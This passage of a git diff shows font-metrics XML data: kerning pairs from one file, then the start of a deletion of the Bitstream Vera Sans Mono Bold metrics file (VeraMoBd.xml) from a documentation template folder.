kpx2="210"/><pair kern="-72" kpx2="82"/><pair kern="-35" kpx2="186"/><pair kern="-35" kpx2="175"/><pair kern="-35" kpx2="209"/><pair kern="-35" kpx2="103"/><pair kern="-128" kpx2="98"/><pair kern="-54" kpx2="81"/><pair kern="-17" kpx2="229"/><pair kern="-35" kpx2="38"/><pair kern="-72" kpx2="121"/><pair kern="-30" kpx2="37"/><pair kern="-54" kpx2="120"/><pair kern="-30" kpx2="51"/><pair kern="-128" kpx2="199"/><pair kern="-30" kpx2="53"/><pair kern="-30" kpx2="137"/><pair kern="-35" kpx2="233"/><pair kern="-35" kpx2="253"/><pair kern="-35" kpx2="52"/><pair kern="-72" kpx2="125"/><pair kern="-35" kpx2="42"/><pair kern="-35" kpx2="90"/><pair kern="-128" kpx2="36"/><pair kern="-35" kpx2="50"/><pair kern="-30" kpx2="39"/><pair kern="-30" kpx2="236"/><pair kern="-30" kpx2="45"/><pair kern="-128" kpx2="173"/><pair kern="-35" kpx2="92"/><pair kern="-35" kpx2="89"/><pair kern="-30" kpx2="46"/><pair kern="-128" kpx2="174"/></kerning><kerning kpx1="53"><pair kern="-21" kpx2="107"/><pair kern="-54" kpx2="235"/><pair kern="-40" kpx2="16"/><pair kern="-44" kpx2="112"/><pair kern="-44" kpx2="123"/><pair kern="-49" kpx2="251"/><pair kern="-44" kpx2="113"/><pair kern="-63" kpx2="187"/><pair kern="-44" kpx2="129"/><pair kern="-44" kpx2="124"/><pair kern="-54" kpx2="169"/><pair kern="-63" kpx2="60"/><pair kern="-40" kpx2="201"/><pair kern="-21" kpx2="106"/><pair kern="-30" kpx2="29"/><pair kern="-63" kpx2="234"/><pair kern="-49" kpx2="100"/><pair kern="-44" kpx2="122"/><pair kern="-21" kpx2="68"/><pair kern="-40" kpx2="58"/><pair kern="-44" kpx2="82"/><pair kern="-54" kpx2="186"/><pair kern="-40" kpx2="98"/><pair kern="-63" kpx2="181"/><pair kern="-35" kpx2="17"/><pair kern="-49" kpx2="38"/><pair kern="-44" kpx2="121"/><pair kern="-54" kpx2="57"/><pair kern="-44" kpx2="126"/><pair kern="-44" kpx2="72"/><pair kern="-40" kpx2="199"/><pair kern="-72" kpx2="180"/><pair kern="-21" kpx2="105"/><pair kern="-49" kpx2="253"/><pair kern="-44" kpx2="125"/><pair kern="-44" kpx2="115"/><pair kern="-17" kpx2="170"/><pair kern="-44" kpx2="88"/><pair kern="-40" kpx2="36"/><pair kern="-44" kpx2="114"/><pair kern="-72" kpx2="55"/><pair kern="-44" kpx2="127"/><pair kern="-21" kpx2="108"/><pair kern="-44" kpx2="128"/><pair kern="-40" kpx2="173"/><pair kern="-21" kpx2="109"/><pair kern="-54" kpx2="92"/><pair kern="-17" kpx2="197"/><pair kern="-21" kpx2="110"/><pair kern="-40" kpx2="174"/></kerning><kerning kpx1="137"><pair kern="-54" kpx2="180"/><pair kern="-40" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="233"><pair kern="-44" kpx2="180"/><pair kern="-35" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="253"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="211"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="78"><pair kern="-17" kpx2="107"/><pair kern="-30" kpx2="126"/><pair kern="-35" kpx2="235"/><pair kern="-35" kpx2="72"/><pair kern="-35" kpx2="112"/><pair kern="-35" kpx2="123"/><pair kern="-35" kpx2="113"/><pair kern="-17" kpx2="105"/><pair kern="-30" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-17" kpx2="106"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="115"/><pair kern="-30" kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-17" kpx2="68"/><pair kern="-35" kpx2="82"/><pair kern="-35" kpx2="114"/><pair kern="-35" kpx2="186"/><pair kern="-30" kpx2="127"/><pair kern="-17" kpx2="108"/><pair kern="-30" kpx2="128"/><pair kern="-17" kpx2="109"/><pair kern="-35" kpx2="92"/><pair kern="-35" kpx2="121"/><pair kern="-17" kpx2="110"/></kerning><kerning kpx1="52"><pair kern="-21" kpx2="180"/><pair kern="-63" kpx2="197"/><pair kern="27" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="125"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="42"><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="169"/><pair kern="-26" kpx2="197"/><pair kern="-35" kpx2="55"/><pair kern="-49" kpx2="60"/><pair kern="-49" kpx2="187"/><pair kern="-21" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-49" kpx2="234"/></kerning><kerning kpx1="170"><pair kern="-17" kpx2="235"/><pair kern="-35" kpx2="199"/><pair kern="-17" kpx2="251"/><pair kern="-109" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-54" kpx2="59"/><pair kern="-109" kpx2="60"/><pair kern="-35" kpx2="201"/><pair kern="-17" kpx2="253"/><pair kern="-109" kpx2="234"/><pair kern="-17" kpx2="90"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="210"/><pair kern="-35" kpx2="36"/><pair kern="-54" kpx2="58"/><pair kern="-91" kpx2="55"/><pair kern="-17" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-17" kpx2="39"/><pair kern="-35" kpx2="98"/><pair kern="-17" kpx2="45"/><pair kern="-35" kpx2="173"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="89"/><pair kern="-86" kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-35" kpx2="174"/></kerning><kerning kpx1="115"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="90"><pair kern="-91" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-104" kpx2="197"/><pair kern="-54" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="36"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="55"><pair kern="-165" kpx2="107"/><pair kern="-155" kpx2="235"/><pair kern="-91" kpx2="16"/><pair kern="-169" kpx2="112"/><pair kern="-169" kpx2="123"/><pair kern="-58" kpx2="251"/><pair kern="-169" kpx2="113"/><pair kern="-165" kpx2="86"/><pair kern="-151" kpx2="129"/><pair kern="-169" kpx2="124"/><pair kern="-91" kpx2="169"/><pair kern="-169" kpx2="252"/><pair kern="-169" kpx2="70"/><pair kern="-146" kpx2="85"/><pair kern="-77" kpx2="201"/><pair kern="-165" kpx2="106"/><pair kern="-109" kpx2="29"/><pair kern="-58" kpx2="100"/><pair kern="-169" kpx2="122"/><pair kern="-165" kpx2="68"/><pair kern="-169" kpx2="82"/><pair kern="-155" kpx2="186"/><pair kern="-165" kpx2="250"/><pair kern="-77" kpx2="98"/><pair kern="-21" kpx2="181"/><pair kern="-118" kpx2="17"/><pair kern="-58" kpx2="38"/><pair kern="-169" kpx2="121"/><pair kern="-165" kpx2="228"/><pair kern="-169" kpx2="254"/><pair kern="-151" kpx2="126"/><pair kern="-169" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-165" kpx2="105"/><pair kern="-58" kpx2="253"/><pair kern="-169" kpx2="125"/><pair kern="-169" kpx2="115"/><pair kern="-54" kpx2="170"/><pair kern="-151" kpx2="88"/><pair kern="-169" kpx2="111"/><pair kern="-165" kpx2="90"/><pair kern="-77" kpx2="36"/><pair kern="-17" kpx2="55"/><pair kern="-169" kpx2="114"/><pair kern="-151" kpx2="127"/><pair kern="-165" kpx2="108"/><pair kern="-30" kpx2="76"/><pair kern="-151" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-165" kpx2="109"/><pair kern="-155" kpx2="92"/><pair kern="-128" kpx2="197"/><pair kern="-165" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="114"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="50"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="91"><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="111"/><pair kern="-30" kpx2="122"/><pair kern="-30" kpx2="82"/><pair kern="-30" kpx2="114"/><pair kern="-30" kpx2="72"/><pair kern="-30" kpx2="112"/><pair kern="-30" kpx2="123"/><pair kern="-30" kpx2="113"/><pair kern="-30" kpx2="124"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-30" kpx2="121"/><pair kern="-30" kpx2="125"/><pair kern="-30" kpx2="115"/></kerning><kerning kpx1="39"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="-17" kpx2="98"/><pair kern="-54" kpx2="187"/><pair kern="-26" kpx2="181"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-17" kpx2="170"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="236"><pair kern="-17" kpx2="180"/><pair kern="-72" kpx2="17"/><pair kern="-91" kpx2="197"/><pair kern="-35" kpx2="29"/></kerning><kerning kpx1="45"><pair kern="-35" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="169"/><pair kern="-54" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-17" kpx2="199"/><pair kern="-35" kpx2="16"/><pair kern="-17" kpx2="174"/><pair kern="-17" kpx2="98"/><pair kern="-30" kpx2="181"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="173"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="197"><pair kern="-35" kpx2="246"/><pair kern="-54" kpx2="235"/><pair kern="-35" kpx2="43"/><pair kern="-35" kpx2="123"/><pair kern="-54" kpx2="251"/><pair kern="-183" kpx2="187"/><pair kern="-54" kpx2="208"/><pair kern="18" kpx2="144"/><pair kern="-35" kpx2="59"/><pair kern="-17" kpx2="73"/><pair kern="-35" kpx2="41"/><pair kern="-35" kpx2="124"/><pair kern="-35" kpx2="85"/><pair kern="-183" kpx2="60"/><pair kern="18" kpx2="201"/><pair kern="-183" kpx2="234"/><pair kern="-54" kpx2="100"/><pair kern="-35" kpx2="122"/><pair kern="-35" kpx2="47"/><pair kern="-54" kpx2="210"/><pair kern="-35" kpx2="82"/><pair kern="-123" kpx2="58"/><pair kern="-54" kpx2="186"/><pair kern="-54" kpx2="175"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-35" kpx2="81"/><pair kern="18" kpx2="98"/><pair kern="-54" kpx2="38"/><pair kern="-35" kpx2="121"/><pair kern="-183" kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-35" kpx2="120"/><pair kern="-35" kpx2="51"/><pair kern="18" kpx2="199"/><pair kern="-35" kpx2="53"/><pair kern="-35" kpx2="137"/><pair kern="-35" kpx2="233"/><pair kern="-54" kpx2="253"/><pair kern="-54" kpx2="52"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="42"/><pair kern="-95" kpx2="90"/><pair kern="18" kpx2="36"/><pair kern="-137" kpx2="55"/><pair kern="-54" kpx2="50"/><pair kern="-35" kpx2="39"/><pair kern="-35" kpx2="236"/><pair kern="22" kpx2="45"/><pair kern="18" kpx2="173"/><pair kern="-54" kpx2="92"/><pair kern="-114" kpx2="89"/><pair kern="-35" kpx2="46"/><pair kern="18" kpx2="174"/></kerning><kerning kpx1="92"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="89"><pair kern="-77" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-132" kpx2="197"/><pair kern="-26" kpx2="16"/><pair kern="-54" kpx2="29"/><pair kern="-17" kpx2="181"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="46"><pair kern="-17" kpx2="107"/><pair kern="-72" kpx2="235"/><pair kern="-104" kpx2="16"/><pair kern="-49" kpx2="112"/><pair kern="-49" kpx2="123"/><pair kern="-54" kpx2="251"/><pair kern="-26" kpx2="213"/><pair kern="-49" kpx2="113"/><pair kern="-35" kpx2="187"/><pair kern="-54" kpx2="208"/><pair kern="-49" kpx2="129"/><pair kern="-49" kpx2="124"/><pair kern="-63" kpx2="169"/><pair kern="-35" kpx2="60"/><pair kern="-17" kpx2="201"/><pair kern="-17" kpx2="106"/><pair kern="-35" kpx2="234"/><pair kern="-54" kpx2="100"/><pair kern="-49" kpx2="122"/><pair kern="-17" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-35" kpx2="58"/><pair kern="-49" kpx2="82"/><pair kern="-72" kpx2="186"/><pair kern="-54" kpx2="175"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-17" kpx2="98"/><pair kern="-30" kpx2="181"/><pair kern="-26" kpx2="212"/><pair kern="-54" kpx2="38"/><pair kern="-49" kpx2="121"/><pair kern="-49" kpx2="126"/><pair kern="-26" kpx2="104"/><pair kern="-49" kpx2="72"/><pair kern="-17" kpx2="199"/><pair kern="-30" kpx2="180"/><pair kern="-17" kpx2="105"/><pair kern="-54" kpx2="253"/><pair kern="-26" kpx2="211"/><pair kern="-49" kpx2="125"/><pair kern="-49" kpx2="115"/><pair kern="-49" kpx2="88"/><pair kern="-17" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-49" kpx2="114"/><pair kern="-54" kpx2="50"/><pair kern="-49" kpx2="127"/><pair kern="-17" kpx2="108"/><pair kern="-49" kpx2="128"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="109"/><pair kern="-72" kpx2="92"/><pair kern="-17" kpx2="110"/><pair kern="-17" kpx2="174"/><pair kern="-26" kpx2="56"/></kerning><kerning kpx1="174"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="56"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning></font-metrics>
\ No newline at end of file
diff --git a/documentation/template/VeraMoBd.xml b/documentation/template/VeraMoBd.xml
deleted file mode 100644
index 9b33107a44..0000000000
--- a/documentation/template/VeraMoBd.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics metrics-version="2" type="TYPE0"><font-name>BitstreamVeraSansMono-Bold</font-name><full-name>Bitstream Vera Sans Mono Bold</full-name><family-name>Bitstream Vera Sans Mono</family-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>759</ascender><descender>-240</descender><bbox><left>-19</left><bottom>-235</bottom><right>605</right><top>928</top></bbox><flags>34</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" ue="209" us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" us="732"/><bf gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="602"/><wx w="0"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx 